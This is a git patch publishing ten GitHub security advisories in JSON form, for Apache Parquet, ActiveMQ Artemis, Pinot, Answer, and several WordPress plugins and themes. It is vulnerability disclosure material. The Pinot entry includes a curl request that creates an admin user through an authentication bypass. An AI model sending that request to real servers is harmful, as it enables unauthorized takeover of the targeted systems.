From 0f5a911664992e39a566d63f76a531e16623541c Mon Sep 17 00:00:00 2001 From: "advisory-database[bot]" <45398580+advisory-database[bot]@users.noreply.github.com> Date: Tue, 1 Apr 2025 09:32:13 +0000 Subject: [PATCH] Publish Advisories GHSA-2c59-37c4-qrx5 GHSA-3w85-5p9g-h334 GHSA-4cqc-m2p5-mfxw GHSA-53mv-532r-jjc4 GHSA-6jwp-4wvj-6597 GHSA-9jfw-fmcq-hgjp GHSA-p7hc-668h-v768 GHSA-vh9q-w22h-fg6g GHSA-w3pv-wm9q-jjjq GHSA-wqcc-mfhw-53pc --- .../GHSA-2c59-37c4-qrx5.json | 36 +++++++++++++ .../GHSA-3w85-5p9g-h334.json | 36 +++++++++++++ .../GHSA-4cqc-m2p5-mfxw.json | 44 ++++++++++++++++ .../GHSA-53mv-532r-jjc4.json | 52 +++++++++++++++++++ .../GHSA-6jwp-4wvj-6597.json | 31 +++++++++++ .../GHSA-9jfw-fmcq-hgjp.json | 40 ++++++++++++++ .../GHSA-p7hc-668h-v768.json | 40 ++++++++++++++ .../GHSA-vh9q-w22h-fg6g.json | 40 ++++++++++++++ .../GHSA-w3pv-wm9q-jjjq.json | 40 ++++++++++++++ .../GHSA-wqcc-mfhw-53pc.json | 31 +++++++++++ 10 files changed, 390 insertions(+) create mode 100644 advisories/unreviewed/2025/04/GHSA-2c59-37c4-qrx5/GHSA-2c59-37c4-qrx5.json create mode 100644 advisories/unreviewed/2025/04/GHSA-3w85-5p9g-h334/GHSA-3w85-5p9g-h334.json create mode 100644 advisories/unreviewed/2025/04/GHSA-4cqc-m2p5-mfxw/GHSA-4cqc-m2p5-mfxw.json create mode 100644 advisories/unreviewed/2025/04/GHSA-53mv-532r-jjc4/GHSA-53mv-532r-jjc4.json create mode 100644 advisories/unreviewed/2025/04/GHSA-6jwp-4wvj-6597/GHSA-6jwp-4wvj-6597.json create mode 100644 advisories/unreviewed/2025/04/GHSA-9jfw-fmcq-hgjp/GHSA-9jfw-fmcq-hgjp.json create mode 100644 advisories/unreviewed/2025/04/GHSA-p7hc-668h-v768/GHSA-p7hc-668h-v768.json create mode 100644 advisories/unreviewed/2025/04/GHSA-vh9q-w22h-fg6g/GHSA-vh9q-w22h-fg6g.json create mode 100644 advisories/unreviewed/2025/04/GHSA-w3pv-wm9q-jjjq/GHSA-w3pv-wm9q-jjjq.json create mode 100644 advisories/unreviewed/2025/04/GHSA-wqcc-mfhw-53pc/GHSA-wqcc-mfhw-53pc.json diff --git a/advisories/unreviewed/2025/04/GHSA-2c59-37c4-qrx5/GHSA-2c59-37c4-qrx5.json b/advisories/unreviewed/2025/04/GHSA-2c59-37c4-qrx5/GHSA-2c59-37c4-qrx5.json new file mode 100644 index 00000000000..3193c2d4689 --- /dev/null +++ b/advisories/unreviewed/2025/04/GHSA-2c59-37c4-qrx5/GHSA-2c59-37c4-qrx5.json @@ -0,0 +1,36 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-2c59-37c4-qrx5", + "modified": "2025-04-01T09:30:20Z", + "published": "2025-04-01T09:30:20Z", + "aliases": [ + "CVE-2025-30065" + ], + "details": "Schema parsing in the parquet-avro module of Apache Parquet 1.15.0 and previous versions allows bad actors to execute arbitrary code\n\n\nUsers are recommended to upgrade to version 1.15.1, which fixes the issue.", + "severity": [ + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-30065" + }, + { + "type": "WEB", + "url": "https://lists.apache.org/thread/okzqb3kn479gqzxm21gg5vqr35om9gw5" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-502" + ], + "severity": "CRITICAL", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2025-04-01T08:15:15Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2025/04/GHSA-3w85-5p9g-h334/GHSA-3w85-5p9g-h334.json b/advisories/unreviewed/2025/04/GHSA-3w85-5p9g-h334/GHSA-3w85-5p9g-h334.json new file mode 100644 index 00000000000..68cbeb53425 --- /dev/null +++ b/advisories/unreviewed/2025/04/GHSA-3w85-5p9g-h334/GHSA-3w85-5p9g-h334.json @@ -0,0 +1,36 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-3w85-5p9g-h334", + "modified": "2025-04-01T09:30:20Z", + "published": "2025-04-01T09:30:19Z", + "aliases": [ + "CVE-2025-27427" + ], + "details": "A vulnerability exists in Apache ActiveMQ Artemis whereby a user with the createDurableQueue or createNonDurableQueue permission on an address can augment the routing-type supported by that address even if said user doesn't have the createAddress permission for that particular address. When combined with the send permission and automatic queue creation a user could successfully send a message with a routing-type not supported by the address when that message should actually be rejected on the basis that the user doesn't have permission to change the routing-type of the address.\n\nThis issue affects Apache ActiveMQ Artemis from 2.0.0 through 2.39.0.\n\nUsers are recommended to upgrade to version 2.40.0 which fixes the issue.", + "severity": [ + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-27427" + }, + { + "type": "WEB", + "url": "https://lists.apache.org/thread/8dzlm2vkqphyrnkrby8r8kzndsm5o6x8" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-863" + ], + "severity": "LOW", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2025-04-01T08:15:13Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2025/04/GHSA-4cqc-m2p5-mfxw/GHSA-4cqc-m2p5-mfxw.json b/advisories/unreviewed/2025/04/GHSA-4cqc-m2p5-mfxw/GHSA-4cqc-m2p5-mfxw.json new file mode 100644 index 00000000000..756290ca4ad --- /dev/null +++ b/advisories/unreviewed/2025/04/GHSA-4cqc-m2p5-mfxw/GHSA-4cqc-m2p5-mfxw.json @@ -0,0 +1,44 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-4cqc-m2p5-mfxw", + "modified": "2025-04-01T09:30:19Z", + "published": "2025-04-01T09:30:19Z", + "aliases": [ + "CVE-2024-12278" + ], + "details": "The Booster for WooCommerce plugin for WordPress is vulnerable to Stored Cross-Site Scripting via any location that typically sanitizes data using wp_kses, like comments, in all versions up to, and including, 7.2.5 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-12278" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/browser/woocommerce-jetpack/trunk/includes/functions/wcj-functions-general.php#L1015" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/changeset/3262569/woocommerce-jetpack/trunk/includes/functions/wcj-functions-general.php" + }, + { + "type": "WEB", + "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/234789db-1440-40ac-83e7-b8afb0ba4b5f?source=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-79" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2025-04-01T07:15:38Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2025/04/GHSA-53mv-532r-jjc4/GHSA-53mv-532r-jjc4.json b/advisories/unreviewed/2025/04/GHSA-53mv-532r-jjc4/GHSA-53mv-532r-jjc4.json new file mode 100644 index 00000000000..c79b2845913 --- /dev/null +++ b/advisories/unreviewed/2025/04/GHSA-53mv-532r-jjc4/GHSA-53mv-532r-jjc4.json @@ -0,0 +1,52 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-53mv-532r-jjc4", + "modified": "2025-04-01T09:30:19Z", + "published": "2025-04-01T09:30:19Z", + "aliases": [ + "CVE-2025-1267" + ], + "details": "The Groundhogg plugin for Wordpress is vulnerable to Stored Cross-Site Scripting via the ‘label' parameter in versions up to, and including, 3.7.4.1 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Administrator-level access, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. This only affects multi-site installations and installations where unfiltered_html has been disabled.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:L/I:L/A:N" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-1267" + }, + { + "type": "WEB", + "url": "https://github.com/groundhoggwp/groundhogg/commit/5206bf2482e2fe210ccca6e7dcfe62ffe85b3061" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/browser/groundhogg/trunk/assets/js/admin/forms/form-builder-v2.js" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/browser/groundhogg/trunk/assets/js/admin/forms/form-builder-v2.js#L859" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/changeset/3264477" + }, + { + "type": "WEB", + "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/763a9aff-9bc0-4c79-9383-778a9034b436?source=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-79" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2025-04-01T07:15:38Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2025/04/GHSA-6jwp-4wvj-6597/GHSA-6jwp-4wvj-6597.json b/advisories/unreviewed/2025/04/GHSA-6jwp-4wvj-6597/GHSA-6jwp-4wvj-6597.json new file mode 100644 index 00000000000..beaea014b78 --- /dev/null +++ b/advisories/unreviewed/2025/04/GHSA-6jwp-4wvj-6597/GHSA-6jwp-4wvj-6597.json @@ -0,0 +1,31 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-6jwp-4wvj-6597", + "modified": "2025-04-01T09:30:20Z", + "published": "2025-04-01T09:30:20Z", + "aliases": [ + "CVE-2024-56325" + ], + "details": "Authentication Bypass Issue\n\nIf the path does not contain / and contain., authentication is not required.\n\nExpected Normal Request and Response Example\n\ncurl -X POST -H \"Content-Type: application/json\" -d {\\\"username\\\":\\\"hack2\\\",\\\"password\\\":\\\"hack\\\",\\\"component\\\":\\\"CONTROLLER\\\",\\\"role\\\":\\\"ADMIN\\\",\\\"tables\\\":[],\\\"permissions\\\":[],\\\"usernameWithComponent\\\":\\\"hack_CONTROLLER\\\"} http://{server_ip}:9000/users \n\n\nReturn: {\"code\":401,\"error\":\"HTTP 401 Unauthorized\"}\n\n\nMalicious Request and Response Example \n\ncurl -X POST -H \"Content-Type: application/json\" -d '{\\\"username\\\":\\\"hack\\\",\\\"password\\\":\\\"hack\\\",\\\"component\\\":\\\"CONTROLLER\\\",\\\"role\\\":\\\"ADMIN\\\",\\\"tables\\\":[],\\\"permissions\\\":[],\\\"usernameWithComponent\\\":\\\"hack_CONTROLLER\\\"}' http://{serverip}:9000/users; http://{serverip}:9000/users; .\n\n\nReturn: {\"users\":{}}\n\n\n\n \n\nA new user gets added bypassing authentication, enabling the user to control Pinot.", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-56325" + }, + { + "type": "WEB", + "url": "https://lists.apache.org/thread/ksf8qsndr1h66otkbjz2wrzsbw992r8v" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-288" + ], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2025-04-01T09:15:15Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2025/04/GHSA-9jfw-fmcq-hgjp/GHSA-9jfw-fmcq-hgjp.json b/advisories/unreviewed/2025/04/GHSA-9jfw-fmcq-hgjp/GHSA-9jfw-fmcq-hgjp.json new file mode 100644 index 00000000000..373e1c626fc --- /dev/null +++ b/advisories/unreviewed/2025/04/GHSA-9jfw-fmcq-hgjp/GHSA-9jfw-fmcq-hgjp.json @@ -0,0 +1,40 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-9jfw-fmcq-hgjp", + "modified": "2025-04-01T09:30:20Z", + "published": "2025-04-01T09:30:20Z", + "aliases": [ + "CVE-2025-27130" + ], + "details": "Welcart e-Commerce 2.11.6 and earlier versions contains an untrusted data deserialization vulnerability. If this vulnerability is exploited, arbitrary code may be executed by a remote unauthenticated attacker who can access websites created using the product.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:L" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-27130" + }, + { + "type": "WEB", + "url": "https://jvn.jp/en/jp/JVN87266215" + }, + { + "type": "WEB", + "url": "https://www.welcart.com/archives/23868.html" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-502" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2025-04-01T09:15:15Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2025/04/GHSA-p7hc-668h-v768/GHSA-p7hc-668h-v768.json b/advisories/unreviewed/2025/04/GHSA-p7hc-668h-v768/GHSA-p7hc-668h-v768.json new file mode 100644 index 00000000000..f8715367469 --- /dev/null +++ b/advisories/unreviewed/2025/04/GHSA-p7hc-668h-v768/GHSA-p7hc-668h-v768.json @@ -0,0 +1,40 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-p7hc-668h-v768", + "modified": "2025-04-01T09:30:19Z", + "published": "2025-04-01T09:30:19Z", + "aliases": [ + "CVE-2025-2891" + ], + "details": "The Real Estate 7 WordPress theme for WordPress is vulnerable to arbitrary file uploads due to missing file type validation via the 'template-submit-listing.php' file in all versions up to, and including, 3.5.4. This makes it possible for authenticated attackers, with Seller-level access and above, to upload arbitrary files on the affected site's server which may make remote code execution possible if front-end listing submission has been enabled.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-2891" + }, + { + "type": "WEB", + "url": "https://contempothemes.com/changelog" + }, + { + "type": "WEB", + "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/5c83457d-ba06-43c5-acdd-77dbfb0d4af4?source=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-434" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2025-04-01T08:15:15Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2025/04/GHSA-vh9q-w22h-fg6g/GHSA-vh9q-w22h-fg6g.json b/advisories/unreviewed/2025/04/GHSA-vh9q-w22h-fg6g/GHSA-vh9q-w22h-fg6g.json new file mode 100644 index 00000000000..e796b3cc3e4 --- /dev/null +++ b/advisories/unreviewed/2025/04/GHSA-vh9q-w22h-fg6g/GHSA-vh9q-w22h-fg6g.json @@ -0,0 +1,40 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-vh9q-w22h-fg6g", + "modified": "2025-04-01T09:30:19Z", + "published": "2025-04-01T09:30:19Z", + "aliases": [ + "CVE-2024-12189" + ], + "details": "The WDesignKit – Elementor & Gutenberg Starter Templates, Patterns, Cloud Workspace & Widget Builder plugin for WordPress is vulnerable to Stored Cross-Site Scripting via custom widgets in all versions up to, and including, 1.2.2 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-12189" + }, + { + "type": "WEB", + "url": "https://wordpress.org/plugins/wdesignkit/#developers" + }, + { + "type": "WEB", + "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/2e936214-ee25-4763-ba7a-b5308cc09a57?source=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-79" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2025-04-01T07:15:38Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2025/04/GHSA-w3pv-wm9q-jjjq/GHSA-w3pv-wm9q-jjjq.json b/advisories/unreviewed/2025/04/GHSA-w3pv-wm9q-jjjq/GHSA-w3pv-wm9q-jjjq.json new file mode 100644 index 00000000000..f9d9c7b99b5 --- /dev/null +++ b/advisories/unreviewed/2025/04/GHSA-w3pv-wm9q-jjjq/GHSA-w3pv-wm9q-jjjq.json @@ -0,0 +1,40 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-w3pv-wm9q-jjjq", + "modified": "2025-04-01T09:30:19Z", + "published": "2025-04-01T09:30:19Z", + "aliases": [ + "CVE-2025-1512" + ], + "details": "The PowerPack Elementor Addons (Free Widgets, Extensions and Templates) plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the Custom Cursor Extension in all versions up to, and including, 2.9.0 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-1512" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/changeset/3262339/powerpack-lite-for-elementor/trunk/assets/js/pp-custom-cursor.js" + }, + { + "type": "WEB", + "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/90579442-b05c-459e-93cb-f4883b6472ff?source=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-79" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2025-04-01T07:15:38Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2025/04/GHSA-wqcc-mfhw-53pc/GHSA-wqcc-mfhw-53pc.json b/advisories/unreviewed/2025/04/GHSA-wqcc-mfhw-53pc/GHSA-wqcc-mfhw-53pc.json new file mode 100644 index 00000000000..f8b772c7bab --- /dev/null +++ b/advisories/unreviewed/2025/04/GHSA-wqcc-mfhw-53pc/GHSA-wqcc-mfhw-53pc.json @@ -0,0 +1,31 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-wqcc-mfhw-53pc", + "modified": "2025-04-01T09:30:20Z", + "published": "2025-04-01T09:30:20Z", + "aliases": [ + "CVE-2025-29868" + ], + "details": "Private Data Structure Returned From A Public Method vulnerability in Apache Answer.\n\nThis issue affects Apache Answer: through 1.4.2.\n\nIf a user uses an externally referenced image, when a user accesses this image, the provider of the image may obtain private information about the ip address of that accessing user.\nUsers are recommended to upgrade to version 1.4.5, which fixes the issue. In the new version, administrators can set whether external content can be displayed.", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-29868" + }, + { + "type": "WEB", + "url": "https://lists.apache.org/thread/l7pohw5g03g3qsvrz8pqc9t29mdv5lhf" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-495" + ], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2025-04-01T08:15:14Z" + } +} \ No newline at end of file